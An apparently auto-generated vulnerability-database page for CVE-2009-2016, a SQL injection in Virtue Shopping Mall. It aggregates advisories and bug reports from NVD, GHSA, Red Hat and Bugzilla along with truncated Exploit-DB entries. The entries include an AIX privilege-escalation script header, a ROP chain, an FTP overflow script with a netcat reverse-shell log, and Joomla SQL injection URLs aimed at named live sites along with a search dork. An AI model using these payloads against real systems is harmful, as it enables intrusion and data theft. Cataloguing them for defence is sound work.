CVE-2009-2016
Published 2009-06-09
Priority: P3 · 41 · high · 7.5 (CVSS 2.0) · AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 1.01% (58.8th percentile)
SQL injection vulnerability in products.php in Virtue Shopping Mall allows remote attackers to execute arbitrary SQL commands via the cid parameter.
CVSS provenance
nvd · v2.0 · 7.5 HIGH · AV:N/AC:L/Au:N/C:P/I:P/A:P
vendor_redhat · 7.5 HIGH
GHSA
GHSA-w55m-5pmp-58mh: SQL injection vulnerability in products
ghsa_unreviewed·2022-05-02
CVE-2009-2016 [HIGH] CWE-89 GHSA-w55m-5pmp-58mh: SQL injection vulnerability in products
SQL injection vulnerability in products.php in Virtue Shopping Mall allows remote attackers to execute arbitrary SQL commands via the cid parameter.
Kernel
namei: allow restricted O_CREAT of FIFOs and regular files
kernel_security·2018-08-23·CVSS 7.2
CVE-2000-1134 [HIGH] namei: allow restricted O_CREAT of FIFOs and regular files
namei: allow restricted O_CREAT of FIFOs and regular files
Disallows open of FIFOs or regular files not owned by the user in world
writable sticky directories, unless the owner is the same as that of the
directory or the file is opened without the O_CREAT flag. The purpose
is to make data spoofing attacks harder. This protection can be turned
on and off separately for FIFOs and regular files via sysctl, just like
the symlinks/hardlinks protection. This patch is based on Openwall's
"HARDEN_FIFO" feature by Solar Designer.
This is a brief list of old vulnerabilities that could have been prevented
by this feature, some of them even allow for privilege escalation:
CVE-2000-1134
CVE-2007-3852
CVE-2008-0525
CVE-2009-0416
CVE-2011-4834
CVE-2015-1838
CVE-2015-7442
CVE-2016-7489
This list is no
Red Hat
kernel: Buffer overflow in firewire driver via crafted incoming packets
vendor_redhat·2016-11-06·CVSS 6.8
CVE-2016-8633 [MEDIUM] CWE-787 kernel: Buffer overflow in firewire driver via crafted incoming packets
kernel: Buffer overflow in firewire driver via crafted incoming packets
drivers/firewire/net.c in the Linux kernel before 4.8.7, in certain unusual hardware configurations, allows remote attackers to execute arbitrary code via crafted fragmented packets.
A buffer overflow vulnerability due to a lack of input filtering of incoming fragmented datagrams was found in the IP-over-1394 driver [firewire-net] in a fragment handling code in the Linux kernel. The vulnerability exists since firewire supported IPv4, i.e. since version 2.6.31 (year 2009) till version v4.9-rc4. A maliciously formed fragment with a respectively large datagram offset would cause a memcpy() past the datagram buffer, which would cause a system panic or possible arbitrary code execution.
The flaw requires [firewire-net] mo
Red Hat
httpd: Billion laughs attack regression
vendor_redhat·2016-08-04·CVSS 7.5
CVE-2016-6312 [HIGH] httpd: Billion laughs attack regression
httpd: Billion laughs attack regression
The mod_dontdothat component of the mod_dav_svn Apache module in Subversion as packaged in Red Hat Enterprise Linux 5.11 does not properly detect recursion during entity expansion, which allows remote authenticated users with access to the webdav repository to cause a denial of service (memory consumption and httpd crash). NOTE: Exists as a regression to CVE-2009-1955.
A denial of service vulnerability was found in subversion. The mod_dontdothat component of the mod_dav_svn Apache module did not properly protect against exponential XML entity expansion attacks. An attacker with credentials to the webdav repository could send a crafted message that would result in resource exhaustion and denial of service to httpd.
Statement: Red Hat Product Securi
Red Hat
squid: Cache poisoning issue in HTTP Request handling
vendor_redhat·2016-05-06·CVSS 5.4
CVE-2016-4553 [MEDIUM] CWE-20 squid: Cache poisoning issue in HTTP Request handling
squid: Cache poisoning issue in HTTP Request handling
client_side.cc in Squid before 3.5.18 and 4.x before 4.0.10 does not properly ignore the Host header when absolute-URI is provided, which allows remote attackers to conduct cache-poisoning attacks via an HTTP request.
An input validation flaw was found in the way Squid handled intercepted HTTP Request messages. An attacker could use this flaw to bypass the protection against issues related to CVE-2009-0801, and perform cache poisoning attacks on Squid.
Package: squid (Red Hat Enterprise Linux 5) - Not affected
Package: squid (Red Hat Enterprise Linux 6) - Not affected
No detection rules found.
Exploit-DB
IBM AIX 5.3/6.1/7.1/7.2 - 'lquerylv' Local Privilege Escalation
exploitdb·2016-11-04·CVSS 6.9
CVE-2016-6079 [MEDIUM] IBM AIX 5.3/6.1/7.1/7.2 - 'lquerylv' Local Privilege Escalation
IBM AIX 5.3/6.1/7.1/7.2 - 'lquerylv' Local Privilege Escalation
---
#!/usr/bin/sh
#
# AIX lquerylv 5.3, 6.1, 7.1, 7.2 local root exploit. Tested against latest patchset (7100-04)
#
# This exploit takes advantage of known issues with debugging functions
# within the AIX linker library. We are taking advantage of known
# functionality, and focusing on badly coded SUID binaries which do not
# adhere to proper security checks prior to seteuid/open/writes.
#
# The CVEs we will be taking advantage of:
# - CVE-2009-1786: The malloc subsystem in libc in IBM AIX 5.3 and 6.1 allows
# local users to create or overwrite arbitrary files via a symlink attack on
# the log file associated with the MALLOCDEBUG environment variable.
#
# - CVE-2009-2669: A certain debugging component in IBM AIX 5.3 and 6.1
Exploit-DB
Easy RM to MP3 Converter 2.7.3.700 - '.m3u' File (Universal ASLR + DEP Bypass)
exploitdb·2016-06-13·CVSS 9.3
CVE-2009-1330 [CRITICAL] Easy RM to MP3 Converter 2.7.3.700 - '.m3u' File (Universal ASLR + DEP Bypass)
Easy RM to MP3 Converter 2.7.3.700 - '.m3u' File (Universal ASLR + DEP Bypass)
---
# Exploit Title: Easy RM to MP3 Converter 2.7.3.700 (.m3u) File BoF Exploit with Universal DEP+ASLR bypass
# Date: 2016-06-12
# Exploit Author: Csaba Fitzl
# Vendor Homepage: N/A
# Software Link: https://www.exploit-db.com/apps/707414955696c57b71c7f160c720bed5-EasyRMtoMP3Converter.exe
# Version: 2.7.3.700
# Tested on: Windows 7 x64
# CVE : CVE-2009-1330
import struct
def create_rop_chain():
# rop chain generated with mona.py - www.corelan.be
# added missing parts, and some optimisation by Csaba Fitzl
rop_gadgets = [
#mov 1000 to EDX - Csaba
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x10025a1c, # XOR EDX,EDX # RETN
0x1002bc3d, # MOV EAX,411 # R
Exploit-DB
Konica Minolta FTP Utility 1.00 - CWD Command Overflow (SEH)
exploitdb·2016-01-11
CVE-2015-7768 Konica Minolta FTP Utility 1.00 - CWD Command Overflow (SEH)
Konica Minolta FTP Utility 1.00 - CWD Command Overflow (SEH)
---
# Title: Konica Minolta FTP Utility 1.00 Post Auth CWD Command SEH Overflow.
# Date : 01/08/2016
# Author: TOMIWA.
# Software link: http://download.konicaminolta.hk/bt/driver/mfpu/ftpu/ftpu_10.zip
# Software: Konica Minolta FTP Utility v1.0
# Tested: Windows 7 SP1 64bits
# Listen for a reverse netcat connection on port 4444
# root@kali:~# nc -nlvp 4444
# listening on [any] 4444 ...
# connect to [192.168.0.11] from (UNKNOWN) [192.168.0.109] 49158
# Microsoft Windows [Version 6.1.7601]
# Copyright (c) 2009 Microsoft Corporation. All rights reserved.
# C:\Program Files (x86)\KONICA MINOLTA\FTP Utility>
#!/usr/bin/python
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7A
Exploit-DB
Joomla! Component Akobook 2.3 - 'gbid' SQL Injection
exploitdb·2009-06-09
CVE-2009-2638 Joomla! Component Akobook 2.3 - 'gbid' SQL Injection
Joomla! Component Akobook 2.3 - 'gbid' SQL Injection
---
Joomla Component com_akobook Vulnerability
###################################################
[+] Author : Ab1i
[+] Email : [email protected]
[+] Dork : inurl:index.php?option=com_akobook
###################################################
Example:
http://localHost/path/components/index.php?option=com_akobook&Itemid=36= ( SQL code )
Demo Live (1):
http://lesnyak.ru/index.php?option=com_akobook&Itemid=31/index.php?option=com_akobook&Itemid=36&func=sign&action=reply&gbid=-1%20+%20birliği%20+%20+1,2,3,4,5,6,7,8,9%20seçin%20,%2010,11,12,13,14,15,%2016,17,18,19%20/%20*
Demo Live (2):
http://www.prostatitunet.ru/index.php?option=com_akobook&Itemid=31/index.php?option=com_akobook&Itemid=36&func=sign&action=reply&gbid=-1%20+%20birl
Exploit-DB
Virtue Shopping Mall - 'cid' SQL Injection
exploitdb·2009-06-08
CVE-2009-2016 Virtue Shopping Mall - 'cid' SQL Injection
Virtue Shopping Mall - 'cid' SQL Injection
---
CMS : Virtue Shopping Mall
WEB : http://www.virtuenetz.com/mall/
File : products.php
Variable Type : GET
Value : cid
Type : SQL Injection
URL : http://www.site.com/products.php?cid=[SQLI]
Exploit :
undersec@Undersec:~/Escritorio$ php exploit.php http://www.virtuenetz.com/mall/
ID :1
Usuario : admin
Password : admin
Gretz :
C1c4tr1z(voodoo-labs.org),Nobody,1995,Lix (arrivalsec.wordpress.com),NanoNRoses,Codebreak(?),Nork And All Friends of Undersecurity.net.
100% CHILE
WWW.UNDERSECURITY.NET
# milw0rm.com [2009-06-08]
Bugzilla
CVE-2016-6312 apr-util, httpd: Billion laughs attack regression
bugzilla·2016-08-04·CVSS 7.5
CVE-2016-6312 [HIGH] CVE-2016-6312 apr-util, httpd: Billion laughs attack regression
CVE-2016-6312 apr-util, httpd: Billion laughs attack regression
A regression was found on RHEL-5.11 making apr-util and httpd vulnerable to billion laughs attack, also known as CVE-2009-1955, again.
Discussion:
Statement:
Red Hat Product Security has rated this issue as having Moderate security
impact. This issue is not currently planned to be addressed in future
updates. For additional information, refer to the Issue Severity
Classification: https://access.redhat.com/security/updates/classification/.
Bugzilla
CVE-2016-4553 squid: Cache poisoning issue in HTTP Request handling
bugzilla·2016-05-09·CVSS 5.4
CVE-2016-4553 [MEDIUM] CVE-2016-4553 squid: Cache poisoning issue in HTTP Request handling
CVE-2016-4553 squid: Cache poisoning issue in HTTP Request handling
Due to incorrect data validation of intercepted HTTP Request messages Squid is vulnerable to clients bypassing the protection against CVE-2009-0801 related issues. This leads to cache poisoning.
External references:
http://www.squid-cache.org/Advisories/SQUID-2016_7.txt
Upstream fix:
http://www.squid-cache.org/Versions/v3/3.5/changesets/squid-3.5-14039.patch
Discussion:
Created squid tracking bugs for this issue:
Affects: fedora-all [bug 1334251]
---
This issue has been addressed in the following products:
Red Hat Enterprise Linux 7
Via RHSA-2016:1139 https://access.redhat.com/errata/RHSA-2016:1139
---
This issue has been addressed in the following products:
Red Hat Enterprise Linux 6
Via RHSA-2016:1140 htt